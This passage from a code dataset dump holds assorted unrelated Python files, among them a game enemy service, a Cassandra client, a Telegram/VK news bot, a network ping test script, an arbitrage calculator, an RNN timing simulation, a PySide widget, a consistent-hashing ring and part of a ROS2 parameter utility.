Optional\n\nfrom server.lib.model.models import EnemyModel, EnemyAbilityModel, UserModel\nfrom server.lib.repository import enemy_repository, repository\n\n\ndef get_enemies(user: UserModel):\n return enemy_repository.get_enemies(user.id)\n\n\ndef create_enemy(name, max_hp, ac, stre, dex, con, inte, wis, cha, user):\n enemies = get_enemies(user)\n for enemy in enemies:\n if enemy.name == name:\n return \"You have already used this enemy name.\"\n\n enemy = EnemyModel.from_name_hp_ac(name, max_hp, ac, user.id)\n\n enemy.strength = stre\n enemy.dexterity = dex\n enemy.constitution = con\n enemy.intelligence = inte\n enemy.wisdom = wis\n enemy.charisma = cha\n\n enemy_repository.create_enemy(enemy)\n return \"\"\n\n\ndef delete_enemy(enemy_id: int, user: UserModel):\n enemy = get_enemy(enemy_id)\n if not enemy:\n return \"This enemy does not exist\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user\"\n\n enemy_repository.delete_enemy(enemy)\n return \"\"\n\n\ndef get_enemy(enemy_id: int):\n return enemy_repository.get_enemy(enemy_id)\n\n\ndef add_ability(enemy_id: int, text: str, user: UserModel):\n enemy = get_enemy(enemy_id)\n\n if enemy is None:\n return \"This enemy does not exist.\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user.\"\n\n ability = EnemyAbilityModel.from_id_text(enemy.id, text)\n enemy_repository.add_ability(ability)\n return \"\"\n\n\ndef get_abilities(eid: int, user: UserModel) -> List[EnemyAbilityModel]:\n enemy = get_enemy(eid)\n\n if enemy.user != user:\n return []\n\n return enemy_repository.get_enemy_abilities(enemy)\n\n\ndef delete_ability(ability_id: int, enemy_id: int, user: UserModel):\n enemy = get_enemy(enemy_id)\n if not enemy:\n return \"This enemy does not exist\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user\"\n\n ability = enemy_repository.get_ability(ability_id)\n\n # This should never happen when the front end works correctly.\n if ability.enemy != enemy:\n return \"This ability does not belong to this 
enemy\"\n\n enemy_repository.delete_ability(ability)\n return \"\"\n\n\ndef edit_ability(ability_id, text, user):\n ability = enemy_repository.get_ability(ability_id)\n if ability.enemy.user != user:\n return \"The ability you are trying to edit does not belong to an enemy created by you.\"\n\n ability.text = text\n repository.add_and_commit(ability)\n\n return \"\"\n","sub_path":"server/lib/service/enemy_service.py","file_name":"enemy_service.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632212030","text":"from cassandra.cluster import Cluster\n\nimport logging\nimport time\n\nlog = logging.getLogger()\nlog.setLevel('INFO')\n\nclass SimpleClient(object):\n\tsession = None\n\tdef connect(self, nodes):\n\t\tcluster = Cluster(nodes)\n\t\tmetadata = cluster.metadata\n\t\tself.session = cluster.connect()\n\t\tlog.info('Connected to cluster: ' + metadata.cluster_name)\n\t\tfor host in metadata.all_hosts():\n\t\t\tlog.info('Datacenter: %s; Host: %s; Rack: %s',\n\t\t\t\thost.datacenter, host.address, host.rack)\n\tdef close(self):\n\t\tself.session.cluster.shutdown()\n\t\tlog.info('Connection closed.')\n\tdef create_schema(self):\n\t\tself.session.execute(\"\"\"CREATE KEYSPACE Kolumbus WITH replication =\n {'class':'SimpleStrategy', 'replication_factor':3};\"\"\")\n\t\tself.session.execute(\"\"\"\n\t\t\tCREATE TABLE Kolumbus.VM (\n\t\t\t\tid uuid PRIMARY KEY,\n\t\t\t\tRecordedAtTime text,\n\t\t\t\tValidUntilTime text,\n\t\t\t\tLinkDistance text,\n\t\t\t\tPercentage text,\n\t\t\t\tLineRef text,\n\t\t\t\tDirectionRef text,\n\t\t\t\tVehicleMode text,\n\t\t\t\tPublishedLineName text,\n\t\t\t\tOriginRef text,\n\t\t\t\tOriginName text,\n\t\t\t\tDestinationRef text,\n\t\t\t\tDestinationName text,\n\t\t\t\tOriginAimedDepartureTime text,\n\t\t\t\tDestinationAimedArrivalTime text,\n\t\t\t\tMonitored text,\n\t\t\t\tLatitude text,\n\t\t\t\tLongitude text,\n\t\t\t\tDelay text,\n\t\t\t\tCourseOfJourneyRef text,\n\t\t\t\tVehicleRef text,\n\t\t\t\tStopPointRef text,\n\t\t\t\tVisitNumber text,\n\t\t\t\tStopPointName text\n\t\t\t); \n\t\t\"\"\")\n\ndef main():\n\tlogging.basicConfig()\n\tclient = SimpleClient()\n\tclient.connect(['152.94.123.92'])\n\tclient.create_schema()\n\ttime.sleep(1)\n\tclient.close()\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"KVMDBCC.py","file_name":"KVMDBCC.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"25460918","text":"from __future__ import print_function\nimport sys\nimport time\nimport telepot\nimport random\nimport datetime\nimport requests\nimport json\nimport os\nimport subprocess\nfrom multiprocessing import Process\n\ndef TokenInput():\n\t\"\"\"Ввод токена из файла.\"\"\"\n\twith open('token', 'r') as file:\n\t\toutput = file.read().replace('\\n', '')\n\treturn output\n\nbot = telepot.Bot(TokenInput()) \n\"\"\"Основа бота, через которую и будем отсылать сообщения.\"\"\"\n\ndef On(chat_id):\n\tread = {}\n\tread[str(chat_id)] = True\n\tjson.dump(read, open(\"to_send\",'w'))\n\tvk = open('vk', 'w')\n\tvk.write(str(0))\n\tvk.close()\n\ttime.sleep(3)\n\tp = Process(target=VkCheck)\n\tp.start()\n\ncommands = { 'on' : On }\n\"\"\"Dict для хранения команд. 
\nThe command text comes first, followed by the function that handles that command.\"\"\"\n\ndef handle(msg):\n\t\"\"\"Handle every incoming message.\"\"\"\n\tprint(\"----------------------------------------\")\n\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\n\tt = datetime.datetime.now()\n\tprint(t.strftime(\"%d %B %I:%M%p\"))\n\tprint(content_type, chat_type, chat_id)\n\t#print(msg)\n\n\tOn(msg['chat']['id'])\n\t\ndef VkCheck():\n\twhile True:\n\t\ttry:\n\t\t\tVkPost()\n\t\t\ttime.sleep(300)\n\t\texcept Exception as e:\n\t\t\tprint(\"Failed\")\n\t\t\tprint(e)\n\t\t\ttime.sleep(10)\n\ndef VkPost():\n\ttry:\n\t\tdata = (requests.get(\"https://api.vk.com/method/wall.get?owner_id=-20301834&count=2\")).json()['response']\n\t\tvk = open('vk', 'r')\n\t\tPrevPost = vk.read()\n\t\tvk.close()\n\t\tif int(PrevPost) != data[2]['id']:\n\t\t\tprint(\"----------------------------------------\")\n\t\t\tprint(data[2]['id'])\n\t\t\tvk = open('vk', 'w')\n\t\t\tvk.write(str(data[2]['id']))\n\t\t\tvk.close()\n\t\t\t\"\"\"Remember the id of the latest post\"\"\"\n\n\t\t\tText = \"\"\n\t\t\n\t\t\tif (data[2]['text'] != None):\n\t\t\t\tText = data[2]['text'] + \"\\n\\n\" + \"' + \"Обсудить новость в вк\"\n\t\t\t\tText = Text.replace(\"
    \", \"\\n\")\n\t\t\t\twhile Text.find('[id') != -1 or Text.find('[club') != -1:\n\t\t\t\t\tText = Text.replace(Text[Text.find('['):Text.find(']')+1], '' + Text[Text.find('|') + 1 : Text.find(']')] + \"\")\n\t\t\t\n\t\t\t\tread = json.load(open(\"to_send\"))\n\t\t\t\t\"\"\"Чтение списка подписанных\"\"\"\n\n\t\t\t\tcounter = 0\n\t\t\t\tfor readed in read:\n\t\t\t\t\tif (read[readed]):\n\t\t\t\t\t\tprint(\"send to \" + readed)\n\t\t\t\t\t\tt = datetime.datetime.now()\n\t\t\t\t\t\tprint(t.strftime(\"%d %B %I:%M%p\"))\n\t\t\t\t\t\tbot.sendMessage(readed, Text, \"HTML\", True)\n\texcept Exception as e:\n\t\tprint(e)\n\ndef Main():\n\tbot.getUpdates(offset=0)\n\tbot.message_loop(handle)\n\tprint ('Listening ...')\n\t# Keep the program running.\n\twhile 1:\n\t\ttime.sleep(10)\n\nif __name__ == '__main__':\n\t Main()\n","sub_path":"esforcebot/esforcebot.py","file_name":"esforcebot.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"410953993","text":"import os\nfrom sys import platform\n\nimport Common_Function as cf\nimport Configuration as conf\n\n# Creating a Directory to store Log Files\nif not os.path.exists(conf.Log_Directory):\n os.mkdir(conf.Log_Directory)\n print(\"Directory \", conf.Log_Directory, \" Created \")\nelse:\n print(\"Directory \", conf.Log_Directory, \" already exists\")\n\n# Creating list of ping commands\nlis = []\nfor addr in conf.url_list:\n File_Name = conf.Log_Directory + '/' + \"Log_\" + addr + \".txt\"\n if platform == \"linux\" or platform == \"linux2\":\n ping_cmd = \"ping \" + addr + \"|./Requirements/TimeStamp.sh|tee \" + File_Name\n elif platform == \"win32\":\n ping_cmd = \"hrping -n \" + conf.ping_packets + \" -T -F \" + File_Name + \" \" + addr \n lis.append(ping_cmd)\n\n# Pinging GW and the websites\ncf.command_execution(lis)\n\n# Exexcuting ipref commands\ncf.command_execution(conf.iperf_list)\n\n# Opening VLC given VLC in Environ Path\ncf.command_execution([conf.vlc_command])\n\n# Opening youtube\ncf.openBrowser(conf.Youtube_url_list, conf.browsercode)\n","sub_path":"Satellite-Ethernet-Backend-Client/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"310339323","text":"import pandas\nimport itertools\nimport numpy as np\nimport os\nimport time\nimport smtplib\n\n\ndef odds_to_percent(odds):\n if odds >= 0:\n return 100. / (odds + 100)\n else:\n return odds / (odds - 100.)\n\n\ndef find_arbitrage(df, convert_odds=False, threshold=0.):\n df = df.copy(deep=True)\n \n # Convert odds to percents\n percents = df.drop(\"timestamp\", axis=1).applymap(odds_to_percent)\n\n profits = percents.apply(arbitrage_profit, axis=1)\n\n if convert_odds:\n df.iloc[:, 1:] = percents.applymap(lambda x: round(x, 2))\n \n df['profits'] = profits\n return df[profits >= threshold]\n\n\ndef arbitrage_profit(row): \n # Find every permutation of sites to search for an arbitrage situation\n # Perms are indicies\n # assumes structure is like so: Bovada A, Bovada B, Pinnacle A, Pinnacle B, ....\n\n num_sites = len(row) / 2 \n perms = list(itertools.permutations(np.arange(num_sites), 2))\n for i, perm in enumerate(perms):\n perms[i] = perm[0], perm[1] + num_sites\n\n arb_probs = [row.iloc[list(perm)].sum(skipna=False) for perm in perms]\n arb_probs = [prob for prob in arb_probs if ~np.isnan(prob)]\n\n if len(arb_probs) > 0:\n best = np.argmin(arb_probs)\n return 1. 
/ arb_probs[best] - 1\n else:\n return np.nan\n\n \n\n\n","sub_path":"arbUtil.py","file_name":"arbUtil.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"343438528","text":"#Code written by Cristian Buc Calderon\r\n#This code implements a RNN connected to a motor node\r\n#The weights from RNN to motor read out the reservor dynamics\r\n#and learn to produce an action at a specific point in times\r\n#using reward-modulated hebbian learning\r\n\r\n##to do list\r\n#maybe in how strong the feedback weights!\r\n\r\nimport numpy as np, matplotlib.pyplot as plt, scipy as sc, os\r\nfrom scipy.sparse import random\r\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\r\nimport copy\r\nimport random as rd\r\n\r\n\r\nos.chdir('C:/Cris/VoT Project/Feedback-Driven-Self-Organization/Cris way/noisy space')\r\n\r\n###Intialization parameters\r\nshow_pic = 1\r\nsave_pic = 0\r\nN_E_rnn = 200\r\nN_motor = 6\r\ntime = 1000\r\ntau_E = 1\r\ntau_I = 1/1\r\ntau_G = 1/1000\r\ntau_A = 1/10\r\ntau_N = 1/10\r\ntau_w = 1/2\r\nN_trials = 1\r\nk_a = 1\r\nk_g = 1\r\nk_n = 0\r\nk_rnn_e = 1\r\nk_rnn_i = 1\r\nbias = 0.4\r\ngain_A_I = 21\r\ngain_A_RNN = 21.4\r\n\r\n###opening storing arrays\r\nRNN_units = np.zeros((N_trials,time,N_E_rnn))\r\nsd_units = np.zeros((N_trials,time,N_E_rnn))\r\nG_units = np.zeros((N_trials,time+1,N_motor))\r\nA_units = np.zeros((N_trials,time+1,N_motor))\r\nN_units = np.zeros((N_trials,time+1,N_motor))\r\nI_units = np.ones((N_trials,time+1))\r\ntest = np.ones((N_trials,time+1))\r\n\r\n\r\n###Loading weight matrices and desired times\r\nW_rnn_E_E = np.loadtxt('RNN_weights.txt', delimiter=',')\r\nW_shut = np.loadtxt('W_shut.txt', delimiter=',')\r\nW_feedback = np.loadtxt('Feedback_weights.txt', delimiter=',')\r\nW_go = np.loadtxt('RNN_Go_weights.txt', delimiter=',')\r\nW_a = np.loadtxt('Go_A_weights.txt', delimiter=',')\r\nW_n = np.loadtxt('A_N_weights.txt', delimiter=',')\r\nW_g_inh = np.loadtxt('G_inh_weights.txt', delimiter=',')\r\nW_inh = np.loadtxt('N_G_inh_weights.txt', delimiter=',')\r\ninputs = np.loadtxt('Inputs_weights.txt', delimiter=',')\r\njEI = np.loadtxt('I_E_weights.txt', delimiter=',')\r\njIE = np.loadtxt('E_I_weights.txt', delimiter=',')\r\ntimes = np.loadtxt('Times.txt', delimiter=',')\r\n\r\n\r\nlamb = 10\r\ndef tanh_f(x,lamb):\r\n z = ((2/(1 + np.exp(-lamb*x)))-1)\r\n z[z<0] = 0\r\n return z\r\n\r\ndef tanh_f_s(x,lamb):\r\n z = ((2/(1 + np.exp(-lamb*x)))-1)\r\n if z < 0:\r\n z = 0\r\n return z\r\n\r\ndef tanh_eli(x):\r\n lambd = 10\r\n d= 2.5\r\n z = d/(1 + np.exp((-lambd*x) + 5))\r\n z[z<0.02] = 0\r\n return z\r\n\r\n\r\n#noise sd\r\nsd_i = 0\r\nsd_rnn = 0\r\nsd_g = 0\r\nsd_a = 0\r\nsd_n = 0\r\n\r\n#global input to g\r\ngain_to_G = np.linspace(0.9,1.2,100) #set to any positive number to accelerate the sequence\r\n\r\n#record ratio\r\nrecord_ratio = np.zeros(len(gain_to_G))\r\n\r\nfor u in range(len(gain_to_G)):\r\n print(u)\r\n for i in range(N_trials):\r\n\r\n ### initial state\r\n rnn_E = np.zeros(N_E_rnn)\r\n rnn_I = 0. 
#1.\r\n G = np.zeros(N_motor)\r\n A = np.zeros(N_motor)\r\n N = np.zeros(N_motor)\r\n\r\n\r\n ### dynamics loop\r\n for j in range(time):\r\n\r\n ### RNN layer\r\n lamb = 10\r\n rnn_i_exc = np.dot(jIE,rnn_E) + np.dot(W_shut,A*gain_A_I) + np.random.normal(0,sd_i,1)\r\n rnn_I += (-k_rnn_i*rnn_I + (rnn_i_exc)) * tau_I\r\n\r\n rnn_e_exc = np.dot(W_rnn_E_E,rnn_E) - (jEI*rnn_I) + (inputs[:,j]) + (np.dot(W_feedback,A*gain_A_RNN))\r\n rnn_E += (-k_rnn_e*rnn_E + tanh_f(rnn_e_exc,lamb) + np.random.normal(0,sd_rnn,N_E_rnn)) * tau_E\r\n rnn_E[rnn_E>1] = 1\r\n rnn_E[rnn_E<0] = 0\r\n\r\n ### G layer\r\n g_exc = (np.dot(W_go,rnn_E) - np.dot(W_inh,N) - np.dot(W_g_inh,G))*gain_to_G[u] #if single gain then gain_to_G\r\n #if j <100:\r\n #g_exc[0] += -1 #for window shift\r\n G += (-k_g*G + g_exc + (np.random.normal(0,sd_g,N_motor))) * tau_G\r\n G[G<0]=0\r\n\r\n ### A layer\r\n lamb = 10000\r\n a_exc = np.dot(W_a,G) - bias\r\n A += (-k_a*A + tanh_f(a_exc,lamb) + np.random.normal(0,sd_a,N_motor)) * tau_A\r\n A[A<0]=0\r\n\r\n ### N Layer\r\n n_exc = np.dot(W_n,A) #* gain_to_N\r\n N += (-k_n*N + n_exc + (np.random.normal(0,sd_n,N_motor))) * tau_N\r\n N[N<0]=0\r\n\r\n ### storing dynamics\r\n A_units[i,j+1,:] = A\r\n\r\n\r\n #quantifying the structure of the sequence (see paper)\r\n tot_ratio = 0\r\n for yy in range(N_motor-2):\r\n first_dif = np.abs(np.argwhere(A_units[0,:,yy]>0.5)[0][0] - np.argwhere(A_units[0,:,yy+1]>0.5)[0][0])\r\n second_dif = np.abs(np.argwhere(A_units[0,:,yy+1]>0.5)[0][0] - np.argwhere(A_units[0,:,yy+2]>0.5)[0][0])\r\n\r\n ratio = second_dif / first_dif\r\n tot_ratio = tot_ratio + ratio\r\n\r\n record_ratio[u]=tot_ratio\r\n\r\n\r\n\r\nplt.figure(figsize=(10,6))\r\nplt.scatter(gain_to_G,record_ratio,s=350,color='k',marker='o',facecolors=\"none\")\r\nplt.ylim(0,15)\r\nplt.yticks(fontsize=20)\r\nplt.xticks(fontsize=20)\r\nplt.xlabel('Mulitplicative input value (ρ)', fontsize=22)\r\nplt.ylabel('Sum of ratios', fontsize=22)\r\nplt.title('Temporal rescaling maintains structure',fontsize=30,y=1.05)\r\nplt.savefig('relative_rescaling.png', dpi=500, bbox_inches='tight')\r\nplt.show()\r\n","sub_path":"Simulation 4 - Temporal rescaling - structure.py","file_name":"Simulation 4 - Temporal rescaling - structure.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"487984268","text":"\n\"\"\"\nblitwizard Editor\nCopyright (c) 2014 Jonas Thiem\n\nThis software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.\n\n 3. 
This notice may not be removed or altered from any source distribution.\n\"\"\"\n\nimport datetime\nimport sys\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nfrom lang.lang import l\nfrom core.treemodel.projectfiletreemodel import ProjectFileTreeModel\n\nclass ProjectFileListWidget(QDockWidget):\n PROJECT_INDEX = 0\n CODE_INDEX = 1\n OBJECTS_INDEX = 3\n RESOURCES_INDEX = 4\n SCENES_INDEX = 2\n ALL_INDEX = 5\n def __init__(self, parent, project, on_file_open=None,\n on_visibility_change=None):\n self.no_update_file_list = True\n self.project = project\n self.on_file_open = on_file_open\n \n super(ProjectFileListWidget, self).__init__(\"BLAH\", parent, 0)\n \n if on_visibility_change:\n self.visibilityChanged.connect(lambda: on_visibility_change())\n\n self.layout = QVBoxLayout()\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n self.setWindowTitle(l(\"projwin_filelist_title\"))\n \n self.box = QWidget()\n self.layout.addWidget(self.box)\n \n self.layout_inner = QVBoxLayout()\n self.box.setLayout(self.layout_inner)\n self.combo = QComboBox()\n self.combo.addItem(\"test\")\n self.combo.currentIndexChanged.connect(\\\n self._rebuild_file_list_forget_index)\n self.layout_inner.addWidget(self.combo)\n\n self.file_list = QTreeView(self)\n self.file_list.setMinimumSize(250, 20)\n self.layout_inner.addWidget(self.file_list)\n\n mainwidget = QWidget()\n mainwidget.setLayout(self.layout)\n self.setWidget(mainwidget)\n\n self.rebuild_combo_contents()\n\n self.no_update_file_list = False\n self._rebuild_file_list_forget_index()\n \n def get_category(self):\n \"\"\" Get the category that is currently in use for viewing\n the selected file:\n \"project\", \"code\", \"objects\", \"resources\", \"scenes\", \"all\"\n \"\"\"\n index = self.combo.currentIndex()\n if index == self.PROJECT_INDEX:\n return \"project\"\n elif index == self.CODE_INDEX:\n return \"code\"\n elif index == self.OBJECTS_INDEX:\n return \"objects\"\n elif index == self.RESOURCES_INDEX:\n return \"resources\"\n elif index == self.SCENES_INDEX:\n return \"scenes\"\n elif index == self.ALL_INDEX:\n return \"all\"\n else:\n raise RuntimeError(\"unknown internal category - internal error\")\n\n def _file_list_open_file(self, index):\n # rate limiting: for some reason, this seems to fire way too often:\n if hasattr(self, \"last_double_click\"):\n if (datetime.datetime.now() - self.last_double_click).total_seconds()\\\n < 0.2:\n # skip, bogus multi-fired event\n return\n self.last_double_click = datetime.datetime.now()\n \n # open up selected item:\n item = self.file_list_model.itemFromIndex(index)\n if not item is None:\n filename = self.file_list_model.filenameFromItem(item)\n if not self.on_file_open is None:\n self.on_file_open(self, filename)\n return True\n \n def _get_index(self):\n current_model_index = self.file_list.currentIndex()\n assert(not current_model_index is None)\n return current_model_index.row()\n \n def _change_index_to(self, index):\n self.file_list.setCurrentIndex(self.file_list_model.\\\n index(index, 0))\n \n def _rebuild_file_list_forget_index(self):\n if self.no_update_file_list:\n return\n title = \"Unknown list\"\n mime_types = None\n index = self.combo.currentIndex()\n if index == self.CODE_INDEX:\n mime_types = [\"text/lua\"]\n title = l(\"projwin_filelist_code_list_title\")\n if index == self.ALL_INDEX:\n title = l(\"projwin_filelist_all_list_title\")\n self.file_list_model = ProjectFileTreeModel(self.project,\n title, mime_types)\n self.file_list.setModel(self.file_list_model)\n selection_model = 
self.file_list.selectionModel()\n self.file_list.doubleClicked.connect(\\\n self._file_list_open_file)\n self._change_index_to(0)\n return\n\n def rebuild_file_list(self):\n \"\"\" This rebuilds the file list entirely, but attempts to keep the\n current file selected. If that is not possible, none will be\n selected.\n Call this when a file was removed or added to the project (or\n renamed).\n \"\"\"\n oldindex = self._get_index()\n assert(not oldindex is None)\n if oldindex < 0:\n self._change_index_to(-1)\n oldfilename = self.file_list_model.filenameFromItem(\n self.file_list_model.itemFromIndex(self.file_list.currentIndex()))\n self._rebuild_file_list_forget_index()\n i = 0\n while i < self.file_list_model.fileEntryListCount():\n if self.file_list_model.filenameFromItem(\n self.file_list_model.itemFromIndex(\\\n self.file_list_model.index(i, 0)))\\\n == oldfilename:\n self._change_index_to(i)\n return\n i = i + 1\n # ok old index wasn't found. change to any index:\n self._change_index_to(-1)\n \n def update_file_list(self):\n \"\"\" This doesn't check for new or removed files, but it checks for\n files being changed or no longer changed (dirty flag).\n \"\"\"\n self.file_list_model.updateDirty()\n return\n \n def update_language(self):\n self.setWindowTitle(l(\"projwin_filelist_title\"))\n self.no_update_file_list = True\n self.rebuild_combo_contents()\n self.no_update_file_list = False\n self.rebuild_file_list()\n\n def rebuild_combo_contents(self):\n index = self.combo.currentIndex()\n if index < 0 or self.combo.count() <= 1:\n index = 1\n while self.combo.count() > 0:\n self.combo.removeItem(0)\n self.combo.addItem(l(\"projwin_filelist_project\"))\n self.combo.addItem(l(\"projwin_filelist_code\"))\n self.combo.addItem(l(\"projwin_filelist_scenes\"))\n self.combo.addItem(l(\"projwin_filelist_objects\"))\n self.combo.addItem(l(\"projwin_filelist_resources\"))\n self.combo.addItem(l(\"projwin_filelist_all\"))\n self.combo.setCurrentIndex(index)\n\n","sub_path":"gui/projectfilelistwidget.py","file_name":"projectfilelistwidget.py","file_ext":"py","file_size_in_byte":7338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"385997960","text":"#import sys module\nimport sys\n#assign arguments from argv to 'input_encoding', and 'error'\nscript, input_encoding, error = sys.argv\n\n#Define main\ndef main(language_file, encoding, errors):\n # assign next line in 'language_file' to variable 'line'\n line = language_file.readline()\n#if line has text in it...\n if line:\n #run function 'print_line' with args: 'line', 'encoding', and 'errors'.\n print_line(line, encoding, errors)\n #go back to main with the same arguments as before.\n return main(language_file, encoding, errors)\n\n#Define a function called 'print_line'\ndef print_line(line, encoding, errors):\n #remove the whitespace from the text in 'line' and assign it to 'next_lang'\n next_lang = line.strip()\n #encode the text in 'next_lang' with encoding specified in first arg. handle errors as errors. 
and assign to 'raw_bytes'\n raw_bytes = next_lang.encode(encoding, errors=errors)\n\n #decode string in 'raw_bytes' and assign to 'cooked_string'\n cooked_string = raw_bytes.decode(encoding, errors=errors)\n\n #print a string including 'raw_bytes' and 'cooked_string'\n print(raw_bytes, \"<===>\", cooked_string)\n\n\n#assign file 'languages.txt' with the encoding 'utf-8' to 'languages'\nlanguages = open(\"languages.txt\", encoding=\"utf-8\")\n\n#run main with 'languages' as its 'language_file' argument and 'error' for its 'errors' argument\nmain(languages, input_encoding, error)\n\n# You have 4 concepts to explore\n# 1.How modern computers store human languages for display and processing and\n# how Python 3 calls these strings.\n# 2.How you must \"encode\" and \"decode\" Python’s strings into a type called bytes.\n# 3.How to handle errors in your string and byte handling.\n# 4.How to read code and find out what it means even if you’ve never seen it before\n","sub_path":"ex23/ex23_break.py","file_name":"ex23_break.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"347510976","text":"import bisect\nimport hashlib\nimport pickle\n\nclass ConsistentHashRing(object):\n\n def __init__(self, replica_nodes=100):\n self.replica_nodes = replica_nodes\n self.keys = []\n self.nodes = {}\n\n def get_hash(self, key):\n object_bytes = pickle.dumps(key)\n return hashlib.md5(object_bytes).hexdigest()\n\n def replica_iterator(self, nodename):\n return (self.get_hash(\"%s:%s\" % (nodename, i)) for i in range(self.replica_nodes))\n\n def __setitem__(self, nodename, node):\n for hash_iter in self.replica_iterator(nodename):\n if hash_iter in self.nodes:\n raise ValueError(\"Node already available: %r\" % nodename)\n self.nodes[hash_iter] = node\n bisect.insort(self.keys, hash_iter)\n\n def __delitem__(self, nodename):\n for hash_iter in self.replica_iterator(nodename):\n # will raise KeyError for nonexistent node name\n del self.nodes[hash_iter]\n index = bisect.bisect_left(self.keys, hash_iter)\n del self.keys[index]\n\n def __getitem__(self, key):\n hash_obj = self.get_hash(key)\n start = bisect.bisect(self.keys, hash_obj)\n if start == len(self.keys):\n start = 0\n return self.nodes[self.keys[start]]","sub_path":"consistent_hashing.py","file_name":"consistent_hashing.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421192622","text":"import os\nimport subprocess\n\nfrom util.lib.OS import OS\nfrom util.lib.Util import Util\n\n\nclass Add_babelDecorator:\n def __init__(self, pack):\n try:\n # bundle with babel\n f_new_path = pack.watch_file + '_new'\n print(f_new_path)\n f_new_fp = OS.open(f_new_path, 'w')\n f_new_fp.write(''.join(pack.lines))\n f_new_fp.close()\n\n f_babel_path = pack.watch_file + '_babel'\n\n cmd = 'babel %s -o %s' % (f_new_path, f_babel_path)\n child = subprocess.Popen(cmd, shell=True)\n child.wait()\n\n f_babel_fp = OS.open(f_babel_path)\n pack.lines = f_babel_fp.readlines(9999999)\n f_babel_fp.close()\n\n os.remove(f_new_path)\n os.remove(f_babel_path)\n except:\n Util.err()\n","sub_path":"handle_file_content/src/lib/Add_babelDecorator.py","file_name":"Add_babelDecorator.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"609673535","text":"# Copyright 2018 Open Source Robotics Foundation, Inc.\n#\n# Licensed under 
the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nfrom rcl_interfaces.msg import Parameter\nfrom rcl_interfaces.msg import ParameterType\nfrom rcl_interfaces.msg import ParameterValue\nfrom rcl_interfaces.srv import DescribeParameters\nfrom rcl_interfaces.srv import GetParameters\nfrom rcl_interfaces.srv import ListParameters\nfrom rcl_interfaces.srv import SetParameters\nimport rclpy\nfrom rclpy.parameter import PARAMETER_SEPARATOR_STRING\nfrom ros2cli.node.direct import DirectNode\n\nimport yaml\n\n\ndef get_value(*, parameter_value):\n \"\"\"Get the value from a ParameterValue.\"\"\"\n if parameter_value.type == ParameterType.PARAMETER_BOOL:\n value = parameter_value.bool_value\n elif parameter_value.type == ParameterType.PARAMETER_INTEGER:\n value = parameter_value.integer_value\n elif parameter_value.type == ParameterType.PARAMETER_DOUBLE:\n value = parameter_value.double_value\n elif parameter_value.type == ParameterType.PARAMETER_STRING:\n value = parameter_value.string_value\n elif parameter_value.type == ParameterType.PARAMETER_BYTE_ARRAY:\n value = list(parameter_value.byte_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_BOOL_ARRAY:\n value = list(parameter_value.bool_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_INTEGER_ARRAY:\n value = list(parameter_value.integer_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_DOUBLE_ARRAY:\n value = list(parameter_value.double_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_STRING_ARRAY:\n value = list(parameter_value.string_array_value)\n elif parameter_value.type == ParameterType.PARAMETER_NOT_SET:\n value = None\n else:\n value = None\n\n return value\n\n\ndef get_parameter_value(*, string_value):\n \"\"\"Guess the desired type of the parameter based on the string value.\"\"\"\n value = ParameterValue()\n try:\n yaml_value = yaml.safe_load(string_value)\n except yaml.parser.ParserError:\n value.type = ParameterType.PARAMETER_STRING\n value.string_value = string_value\n return value\n\n if isinstance(yaml_value, bool):\n value.type = ParameterType.PARAMETER_BOOL\n value.bool_value = yaml_value\n elif isinstance(yaml_value, int):\n value.type = ParameterType.PARAMETER_INTEGER\n value.integer_value = yaml_value\n elif isinstance(yaml_value, float):\n value.type = ParameterType.PARAMETER_DOUBLE\n value.double_value = yaml_value\n elif isinstance(yaml_value, list):\n if all((isinstance(v, bool) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_BOOL_ARRAY\n value.bool_array_value = yaml_value\n elif all((isinstance(v, int) for v in yaml_value)):\n value.type = 